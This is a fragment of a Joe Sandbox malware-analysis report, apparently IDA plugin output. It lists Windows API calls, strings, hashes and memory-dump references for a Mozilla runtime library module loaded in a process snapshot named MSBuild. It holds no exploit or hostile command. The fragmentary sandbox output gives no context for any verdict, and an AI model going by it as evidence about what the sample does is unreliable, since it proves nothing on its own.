                                                                                                                                                                                                                      • API String ID: 1832963901-4276087706
                                                                                                                                                                                                                      • Opcode ID: b75051cbb390aeaabac35b5105737f6b22c73025bcb85a2620f4e91ad9a7ba45
                                                                                                                                                                                                                      • Instruction ID: 334cb142114609fd58c888467925e8b8cd39f05f1b636cd7cf5b4d44cf0f3cd9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b75051cbb390aeaabac35b5105737f6b22c73025bcb85a2620f4e91ad9a7ba45
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA21B074B001088FDF10DF68D959AAEB7B5BF85208F244828ED0AA7740DB31E909C7E2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 6C8E7526
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8E7566
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8E7597
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                                                                                      • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 3217676052-1401603581
                                                                                                                                                                                                                      • Opcode ID: 0a5b0be0674a6e02c01fdf1fd91d40d2adffb092519a7eeb514fc9efca14c0d6
                                                                                                                                                                                                                      • Instruction ID: 36f459d8c1b5bacf32d265febb08eeb63a39ea69e56ed3c9fffde36c619eecff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a5b0be0674a6e02c01fdf1fd91d40d2adffb092519a7eeb514fc9efca14c0d6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7721F531705501ABDF34CBA98A15E9A3375EB8BB6EB20092DE80557F41C731AA06C69B
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90F770,-00000001,?,6C8FE330,?,6C8ABDF7), ref: 6C8EA7AF
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C8ABDF7), ref: 6C8EA7C2
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000018,?,6C8ABDF7), ref: 6C8EA7E4
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90F770), ref: 6C8EA80A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                                                                                                                                                                      • String ID: accelerator.dll
                                                                                                                                                                                                                      • API String ID: 2442272132-2426294810
                                                                                                                                                                                                                      • Opcode ID: 64d96665bd3e0fce44ae7b0681162abf02c642f34831943fd8739239443ce011
                                                                                                                                                                                                                      • Instruction ID: 610678c9009756b41a06335b17fbdd0bd0cd1a83b3e117da99a1bdee3d2593d0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64d96665bd3e0fce44ae7b0681162abf02c642f34831943fd8739239443ce011
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D018FB07043049F9B14CF5AD9C4C627BF8FB8BB59714846EE849CB702DB719900CBA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(ole32,?,6C88EE51,?), ref: 6C88F0B2
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C88F0C2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C88F0DC
                                                                                                                                                                                                                      • Could not find CoTaskMemFree, xrefs: 6C88F0E3
                                                                                                                                                                                                                      • ole32, xrefs: 6C88F0AD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                      • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                                                                                                                                                                      • API String ID: 2574300362-1578401391
                                                                                                                                                                                                                      • Opcode ID: 710d692ac3c088dc513aadf4fe0ac0f5ac37294897918d47eb018c16014daf27
                                                                                                                                                                                                                      • Instruction ID: 1517b3d3b03a55a2bec78cda3112211061cb0e9e1fd52fcf820870102b78ec3f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 710d692ac3c088dc513aadf4fe0ac0f5ac37294897918d47eb018c16014daf27
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFE0267134E3059FEF246A7A9909A2737B9ABA324D3308A2DF402C1F01EF30D410CA66
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C897204), ref: 6C8C0088
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C8C00A7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C897204), ref: 6C8C00BE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 145871493-3385133079
                                                                                                                                                                                                                      • Opcode ID: c4e0cb3a5332b3b68d7980b80cdd42c98faf73511d032191651c6b1c2cd5c38e
                                                                                                                                                                                                                      • Instruction ID: caef8aa67c92e347ebb56db9d5b62a13266d96f7a3ce513c0545705c849c8dae
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4e0cb3a5332b3b68d7980b80cdd42c98faf73511d032191651c6b1c2cd5c38e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AE092B47483059BEF10AF6699087827AFCB70B389F3144AEAD16C2650DBB4D184DF5A
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C897235), ref: 6C8C00D8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C8C00F7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C897235), ref: 6C8C010E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C8C00F1
                                                                                                                                                                                                                      • wintrust.dll, xrefs: 6C8C00D3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 145871493-2559046807
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C897266), ref: 6C8C01C8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6C8C01E7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C897266), ref: 6C8C01FE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: CryptCATAdminReleaseContext$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 145871493-1489773717
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C897297), ref: 6C8C0128
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C8C0147
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C897297), ref: 6C8C015E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 145871493-1536241729
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C897308), ref: 6C8C0178
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C8C0197
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C897308), ref: 6C8C01AE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: CryptCATCatalogInfoFromContext$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 145871493-3354427110
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6C8EC0E9), ref: 6C8EC418
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C8EC437
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C8EC0E9), ref: 6C8EC44C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                                                                      • API String ID: 145871493-2623246514
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6C8E748B,?), ref: 6C8E75B8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C8E75D7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C8E748B,?), ref: 6C8E75EC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                                                                                      • API String ID: 145871493-3641475894
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6C8E7592), ref: 6C8E7608
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C8E7627
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C8E7592), ref: 6C8E763C
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                                                                                                                      • API String ID: 145871493-1050664331
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C8EC1DE,?,00000000,?,00000000,?,6C89779F), ref: 6C8EC1F8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6C8EC217
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C8EC1DE,?,00000000,?,00000000,?,6C89779F), ref: 6C8EC22C
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: WinVerifyTrust$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 145871493-2991032369
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C8977C5), ref: 6C8EC298
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6C8EC2B7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C8977C5), ref: 6C8EC2CC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • CryptCATAdminCalcHashFromFileHandle, xrefs: 6C8EC2B1
                                                                                                                                                                                                                      • wintrust.dll, xrefs: 6C8EC293
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 145871493-1423897460
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(kernelbase.dll,?,6C8905BC), ref: 6C8EBAB8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6C8EBAD7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C8905BC), ref: 6C8EBAEC
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: VirtualAlloc2$kernelbase.dll
                                                                                                                                                                                                                      • API String ID: 145871493-1188699709
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?,?,6C8EBE49), ref: 6C8EBEC4
                                                                                                                                                                                                                      • RtlCaptureStackBackTrace.NTDLL ref: 6C8EBEDE
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C8EBE49), ref: 6C8EBF38
                                                                                                                                                                                                                      • RtlReAllocateHeap.NTDLL ref: 6C8EBF83
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(6C8EBE49,00000000), ref: 6C8EBFA6
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2764315370-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C8CB58D,?,?,?,?,?,?,?,6C8FD734,?,?,?,6C8FD734), ref: 6C8D8E6E
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C8CB58D,?,?,?,?,?,?,?,6C8FD734,?,?,?,6C8FD734), ref: 6C8D8EBF
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6C8CB58D,?,?,?,?,?,?,?,6C8FD734,?,?,?), ref: 6C8D8F24
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C8CB58D,?,?,?,?,?,?,?,6C8FD734,?,?,?,6C8FD734), ref: 6C8D8F46
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6C8CB58D,?,?,?,?,?,?,?,6C8FD734,?,?,?), ref: 6C8D8F7A
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C8CB58D,?,?,?,?,?,?,?,6C8FD734,?,?,?), ref: 6C8D8F8F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
• Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3061335427-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C895FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8960F4
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C895FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C896180
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6C895FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C896211
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C895FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C896229
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6C895FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C89625E
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C895FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C896271
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
• Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3061335427-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C8D2620,?,?,?,6C8C60AA,6C8C5FCB,6C8C79A3), ref: 6C8D284D
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C8D2620,?,?,?,6C8C60AA,6C8C5FCB,6C8C79A3), ref: 6C8D289A
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6C8D2620,?,?,?,6C8C60AA,6C8C5FCB,6C8C79A3), ref: 6C8D28F1
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C8D2620,?,?,?,6C8C60AA,6C8C5FCB,6C8C79A3), ref: 6C8D2910
                                                                                                                                                                                                                      • free.MOZGLUE(00000001,?,?,6C8D2620,?,?,?,6C8C60AA,6C8C5FCB,6C8C79A3), ref: 6C8D293C
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C8D2620,?,?,?,6C8C60AA,6C8C5FCB,6C8C79A3), ref: 6C8D294E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
• Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3061335427-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784), ref: 6C88CFF6
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C88D026
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C88D06C
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C88D139
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
• Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                                                                                                                                                                      • String ID: MOZ_CRASH()
                                                                                                                                                                                                                      • API String ID: 1090480015-2608361144
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C884E5A
                                                                                                                                                                                                                      • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C884E97
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C884EE9
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C884F02
                                                                                                                                                                                                                      • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C884F1E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
• Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 713647276-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C89C1BC
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C89C1DC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Now@Stamp@mozilla@@TimeV12@_strlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1885715127-0
                                                                                                                                                                                                                      • Opcode ID: 29df332d570adf5c4911972a0476508c5d1f4c7ee4c423370a2f047a03f28c00
                                                                                                                                                                                                                      • Instruction ID: 6c14f799f02cf429f0560fbaff747f30107021103e102028bfc27cf7f0bf6c0b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29df332d570adf5c4911972a0476508c5d1f4c7ee4c423370a2f047a03f28c00
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC41A4719087408FD720DFA8D68079AB7F4AF9A308F51896DE8989B712E731D548CB93
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C8E61DD
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C8E622C
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C8E6250
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8E6292
                                                                                                                                                                                                                      Strings
